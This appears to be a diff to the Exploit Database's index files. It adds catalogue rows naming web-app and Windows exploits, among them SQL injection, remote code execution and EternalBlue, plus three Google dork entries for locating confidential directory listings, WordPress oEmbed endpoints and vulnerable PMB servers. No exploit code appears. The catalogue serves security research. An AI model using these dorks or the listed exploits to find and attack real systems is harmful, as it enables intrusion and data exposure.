 19325,exploits/php/webapps/19325.txt,"Commentics 2.0 - Multiple Vulnerabilities",2012-06-21,"Jean Pascal Pereira",webapps,php,,2012-06-21,2012-06-21,0,OSVDB-83148;OSVDB-83147;OSVDB-83146,,,,http://www.exploit-db.comcommentics.zip,
 2648,exploits/php/webapps/2648.txt,"CommentIT - 'PathToComment' Remote File Inclusion",2006-10-25,"Cold Zero",webapps,php,,2006-10-24,,1,,,,,,
 51809,exploits/php/webapps/51809.py,"comments-like-dislike < 1.2.0 - Authenticated (Subscriber+) Plugin Setting Reset",2024-02-26,"Diaa Hanna",webapps,php,,2024-02-26,2024-02-26,0,,,,,,
 26570,exploits/php/webapps/26570.txt,"CommodityRentals 2.0 - SQL Injection",2005-11-23,r0t3d3Vil,webapps,php,,2005-11-23,2013-07-03,1,,,,,,https://www.securityfocus.com/bid/15552/info
 33634,exploits/php/webapps/33634.txt,"CommodityRentals CD Rental Software - 'index.php' SQL Injection",2010-02-11,"Don Tukulesto",webapps,php,,2010-02-11,2014-06-04,1,,,,,,https://www.securityfocus.com/bid/38184/info
 36079,exploits/php/webapps/36079.txt,"CommodityRentals Real Estate Script - 'txtsearch' HTML Injection",2011-08-24,"Eyup CELIK",webapps,php,,2011-08-24,2015-02-15,1,,,,,,https://www.securityfocus.com/bid/49296/info
@ -24905,6 +24912,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 48647,exploits/php/webapps/48647.txt,"Online Shopping Portal 3.1 - 'email' SQL Injection",2020-07-07,gh1mau,webapps,php,,2020-07-07,2020-07-07,0,,,,,,
 48631,exploits/php/webapps/48631.txt,"Online Shopping Portal 3.1 - Authentication Bypass",2020-07-01,"Ümit Yalçın",webapps,php,,2020-07-01,2020-07-01,0,,,,,,
 50029,exploits/php/webapps/50029.py,"Online Shopping Portal 3.1 - Remote Code Execution (Unauthenticated)",2021-06-17,Tagoletta,webapps,php,,2021-06-17,2021-06-17,0,,,,,,
 51811,exploits/php/webapps/51811.txt,"Online Shopping System Advanced - Sql Injection",2024-02-26,"Furkan Gedik",webapps,php,,2024-02-26,2024-02-26,0,,,,,,
 48383,exploits/php/webapps/48383.txt,"Online shopping system advanced 1.0 - 'p' SQL Injection",2020-04-27,"Majid kalantari",webapps,php,,2020-04-27,2020-04-27,0,,,,,,
 51103,exploits/php/webapps/51103.txt,"Online shopping system advanced 1.0 - Multiple Vulnerabilities",2023-03-28,"Rafael Pedrero",webapps,php,,2023-03-28,2023-05-31,1,,,,,,
 35480,exploits/php/webapps/35480.txt,"Online store PHP script - Multiple Cross-Site Scripting / SQL Injections",2011-03-21,"kurdish hackers team",webapps,php,,2011-03-21,2014-12-07,1,,,,,,https://www.securityfocus.com/bid/46960/info
@ -30546,6 +30554,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 35337,exploits/php/webapps/35337.txt,"TaskFreak! 0.6.4 - 'print_list.php' Multiple Cross-Site Scripting Vulnerabilities",2011-02-12,LiquidWorm,webapps,php,,2011-02-12,2016-10-27,1,CVE-2011-1062;OSVDB-70878,,,,http://www.exploit-db.comtaskfreak-multi-mysql-0.6.4.tgz,https://www.securityfocus.com/bid/46350/info
 35338,exploits/php/webapps/35338.txt,"TaskFreak! 0.6.4 - 'rss.php' HTTP Referer Header Cross-Site Scripting",2011-02-12,LiquidWorm,webapps,php,,2011-02-12,2016-10-27,1,CVE-2011-1062;OSVDB-70932,,,,http://www.exploit-db.comtaskfreak-multi-mysql-0.6.4.tgz,https://www.securityfocus.com/bid/46350/info
 16158,exploits/php/webapps/16158.txt,"TaskFreak! 0.6.4 - Multiple Cross-Site Scripting Vulnerabilities",2011-02-12,LiquidWorm,webapps,php,,2011-02-12,2011-02-12,0,CVE-2011-1062;OSVDB-70932;OSVDB-70878;OSVDB-70877,,,,http://www.exploit-db.comtaskfreak-multi-mysql-0.6.4.tgz,http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-4990
 51810,exploits/php/webapps/51810.txt,"taskhub 2.8.7 - SQL Injection",2024-02-26,CraCkEr,webapps,php,,2024-02-26,2024-02-26,0,,,,,,
 51692,exploits/php/webapps/51692.txt,"Taskhub CRM Tool 2.8.6 - SQL Injection",2023-08-21,"Ahmet Ümit BAYRAM",webapps,php,,2023-08-21,2023-08-21,0,,,,,,
 51782,exploits/php/webapps/51782.txt,"TASKHUB-2.8.8 - XSS-Reflected",2024-02-05,nu11secur1ty,webapps,php,,2024-02-05,2024-02-05,0,,,,,,
 15269,exploits/php/webapps/15269.txt,"Tastydir 1.2 (1216) - Multiple Vulnerabilities",2010-10-17,R,webapps,php,,2010-10-17,2015-04-17,0,,,,,,
@ -46237,6 +46246,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 46250,exploits/windows_x86-64/remote/46250.py,"CloudMe Sync 1.11.2 Buffer Overflow - WoW64 (DEP Bypass)",2019-01-28,"Matteo Malvica",remote,windows_x86-64,,2019-01-28,2019-01-29,0,CVE-2018-6892,"Buffer Overflow",,,http://www.exploit-db.comCloudMe_1112.exe,
 44784,exploits/windows_x86-64/remote/44784.py,"CloudMe Sync < 1.11.0 - Buffer Overflow (SEH) (DEP Bypass)",2018-05-28,"Juan Prescotto",remote,windows_x86-64,,2018-05-28,2018-05-28,0,,,,,,
 44275,exploits/windows_x86-64/remote/44275.txt,"DEWESoft X3 SP1 (x64) - Remote Command Execution",2018-03-12,hyp3rlinx,remote,windows_x86-64,,2018-03-12,2018-03-12,0,CVE-2018-7756,,,,,
 51817,exploits/windows_x86-64/remote/51817.txt,"IBM i Access Client Solutions v1.1.2 - 1.1.4_ v1.1.4.3 - 1.1.9.4 - Remote Credential Theft",2024-02-26,hyp3rlinx,remote,windows_x86-64,,2024-02-26,2024-02-26,0,CVE-2024-22318,,,,,
 42354,exploits/windows_x86-64/remote/42354.html,"Microsoft Internet Explorer - 'mshtml.dll' Remote Code Execution (MS17-007)",2017-07-24,redr2e,remote,windows_x86-64,,2017-07-24,2017-07-26,0,CVE-2017-0059;CVE-2017-0037,,,,,https://redr2e.com/cve-to-exploit-cve-2017-0037-and-0059/
 42030,exploits/windows_x86-64/remote/42030.py,"Microsoft Windows 8/8.1/2012 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS17-010)",2017-05-17,sleepya,remote,windows_x86-64,445,2017-05-19,2019-03-28,1,CVE-2017-0144,,EternalBlue,http://www.exploit-db.com/screenshots/idlt42500/screen-shot-2018-09-30-at-103641.png,,https://github.com/worawit/MS17-010/blob/873c5453680a0785415990379a4b36ba61f82a4d/eternalblue_exploit8.py
 41987,exploits/windows_x86-64/remote/41987.py,"Microsoft Windows Server 2008 R2 (x64) - 'SrvOs2FeaToNt' SMB Remote Code Execution (MS17-010)",2017-05-10,"Juan Sacco",remote,windows_x86-64,,2017-05-10,2018-10-17,0,CVE-2017-0148;CVE-2017-0147;CVE-2017-0146;CVE-2017-0145;CVE-2017-0144;CVE-2017-0143,,,,,
--- a/ghdb.xml
+++ b/ghdb.xml
@ -41760,6 +41760,21 @@ Sagar Banwa
  <date>2023-02-27</date>
  <author>Sanu Jose M</author>
 </entry>
 <entry>
  <id>8420</id>
  <link>https://www.exploit-db.com/ghdb/8420</link>
  <category>Files Containing Juicy Info</category>
  <shortDescription>intitle:&quot;Index of /confidential&quot;</shortDescription>
  <textualDescription>Description-* intitle:&quot;Index of /confidential&quot;*
 This google dork searches in the title of websites for the &quot;&quot;Index of
 /confidential&quot;
 </textualDescription>
  <query>intitle:&quot;Index of /confidential&quot;</query>
  <querystring>https://www.google.com/search?q=intitle:&quot;Index of /confidential&quot;</querystring>
  <edb></edb>
  <date>2024-02-26</date>
  <author>Gautam Rawat</author>
 </entry>
 <entry>
  <id>8039</id>
  <link>https://www.exploit-db.com/ghdb/8039</link>
@ -51560,6 +51575,27 @@ Dxtroyer</textualDescription>
  <date>2023-11-20</date>
  <author>Sathish Kishore</author>
 </entry>
 <entry>
  <id>8418</id>
  <link>https://www.exploit-db.com/ghdb/8418</link>
  <category>Files Containing Juicy Info</category>
  <shortDescription>inurl:&quot;/wp-json/oembed/1.0/embed?url=&quot;</shortDescription>
  <textualDescription>Google Dork:
 inurl:&quot;/wp-json/oembed/1.0/embed?url=&quot;
 Description:
 Using this Google dork can help identify WordPress sites that have their
 oEmbed API publicly accessible, which could potentially be useful for
 various purposes such as content scraping, data analysis, or security
 research. However, it's essential to use this information ethically and
 responsibly, respecting the privacy and security of the websites you
 interact with.</textualDescription>
  <query>inurl:&quot;/wp-json/oembed/1.0/embed?url=&quot;</query>
  <querystring>https://www.google.com/search?q=inurl:&quot;/wp-json/oembed/1.0/embed?url=&quot;</querystring>
  <edb></edb>
  <date>2024-02-26</date>
  <author>Jeel Patel</author>
 </entry>
 <entry>
  <id>4678</id>
  <link>https://www.exploit-db.com/ghdb/4678</link>
@ -116029,6 +116065,23 @@ Ahmad Al-Nounou
  <date>2014-05-05</date>
  <author>anonymous</author>
 </entry>
 <entry>
  <id>8419</id>
  <link>https://www.exploit-db.com/ghdb/8419</link>
  <category>Vulnerable Servers</category>
  <shortDescription>&quot;PMB&quot; AND (&quot;changelog.txt&quot; OR inurl:opac_css)</shortDescription>
  <textualDescription>The Dork Filters for PMB Services, Mostly vulnerable to SQli and handful of
 CVEs
 *&quot;PMB&quot; AND (&quot;changelog.txt&quot; OR inurl:opac_css)*
 </textualDescription>
  <query>&quot;PMB&quot; AND (&quot;changelog.txt&quot; OR inurl:opac_css)</query>
  <querystring>https://www.google.com/search?q=&quot;PMB&quot; AND (&quot;changelog.txt&quot; OR inurl:opac_css)</querystring>
  <edb></edb>
  <date>2024-02-26</date>
  <author>Wallehazz</author>
 </entry>
 <entry>
  <id>6161</id>
  <link>https://www.exploit-db.com/ghdb/6161</link>